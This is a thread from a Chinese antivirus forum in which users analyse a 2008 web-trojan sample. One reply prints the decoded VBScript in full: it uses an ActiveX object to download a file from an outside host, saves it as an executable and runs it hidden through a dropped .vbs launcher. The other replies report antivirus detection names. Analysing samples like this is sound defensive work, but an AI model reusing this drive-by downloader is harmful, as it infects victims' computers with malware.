12
返回列表 发新帖
楼主: e54hacker
收起左侧

[可疑文件] 第一次遇到这样的网马的加密算法!

[复制链接]
BING126
头像被屏蔽
发表于 2008-8-27 20:21:24 | 显示全部楼层
McAfee   c.jpg   Downloader-BIS
xqiafl
发表于 2008-8-27 21:34:26 | 显示全部楼层
Dim pMLmUlXbCcnhzwToOGCNetPDMgeIKqKQYNsCDBGdgqVihxCEvVkcNuwRtyMTrFeeGPbDXCasSsExQyWGQWSeuKRTcAuYaHNgodTFFETtAIYyxOEHyXBfdLzUKBPZIIuvWfrUnSqTUTGASPmWgmiuLMhgsQxaqXdwFtaVVUZKDKoPBRUXPnRvfbQkbSfpYYMxZvIWEVHLlZWQigDYwDyLOcxzTTOrHZtNHwclmkpaTaFSRhknfETMwegBdivGbocOpML On Error Resume Next aVKeV="http://h96c.info/c.jpg" Set zOY = document.createElement("object") zOY.SetAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" OOBnPl="Microsoft.XMLHTTp" Set WkS = zOY.CreateObject(OOBnPl,"") WkS.Open "GET", aVKeV, False WkS.Send ExeName="QkbSfpYYMxZvIWEVHLlZWQigDYwDyLOcxzTTO.com" VbsName="rHZtNHwclmkpaTaFSRhknfETMwegBdivGbocO.vbs" Set FPI = zOY.createobject("Scripting.FileSystemObject","") Set sTmp = FPI.GetSpecialFolder(2) ExeName=FPI.BuildPath(sTmp,ExeName) VbsName=FPI.BuildPath(sTmp,VbsName) AA="Ad" AB="odb.stream" AdM=AA&AB Set Dpt = zOY.createobject(AdM,"") Dpt.type=1 Dpt.Open Dpt.Write WkS.ResponseBody Dpt.Savetofile ExeName,2 Dpt.Close Dpt.Type=2 Dpt.Open Dpt.WriteText "on error resume next"&vbCrLf&"Set Shell = CreateObject(""Wsc"" & ""rip"" & ""t.Shell"")"&vbCrLf&"Shell.Run ("""&ExeName&""")"&vbCrLf&"Set Shell = Nothing" Dpt.Savetofile VbsName,2 Dpt.Close sRun="Shell.Appli" Set Run = zOY.createobject(sRun&"cation","") Run.ShellExecute VbsName,"","","Open",0  


06014
allinwonderi
发表于 2008-8-27 21:38:57 | 显示全部楼层

F-Prot 4.4.4

<W32/Agent.L.gen!Eldorado (not disinfectable, 普通)>        C:\Download Files\c.rar->c.jpg->(UPack)
e54hacker
 楼主| 发表于 2008-8-27 23:12:39 | 显示全部楼层
感谢楼上的几位!
sam.to
发表于 2008-8-27 23:20:59 | 显示全部楼层
原帖由 qianwenxiang 于 2008-8-27 15:09 发表
[http://h96c.info/c.jpg]

ACCESS DENIED
The requested URL could not be retrieved

While trying to retrieve the URL: htp://h96c.info/c.jpg

The folowing error was encountered:

    * The requested object is INFECTED. The following viruses Trojan-GameThief.Win32.OnLineGames.sxpg were found

Please contact your service provider if you feel this is incorrect.

Generated Wed Aug 27 23:20:31 2008 by Kaspersky Internet Security 7.0
tanlimo
发表于 2008-8-28 00:12:09 | 显示全部楼层
楼上导致此页报毒........

377826
头像被屏蔽
发表于 2008-8-29 15:57:57 | 显示全部楼层
这是VBS脚本加密!不足为奇!
conan1229
发表于 2008-8-29 16:00:45 | 显示全部楼层
又被卡巴给费了
maozi778631
发表于 2008-8-29 21:03:33 | 显示全部楼层
费尔杀,楼上的导致这页都报
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-6-26 22:50 , Processed in 0.102980 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表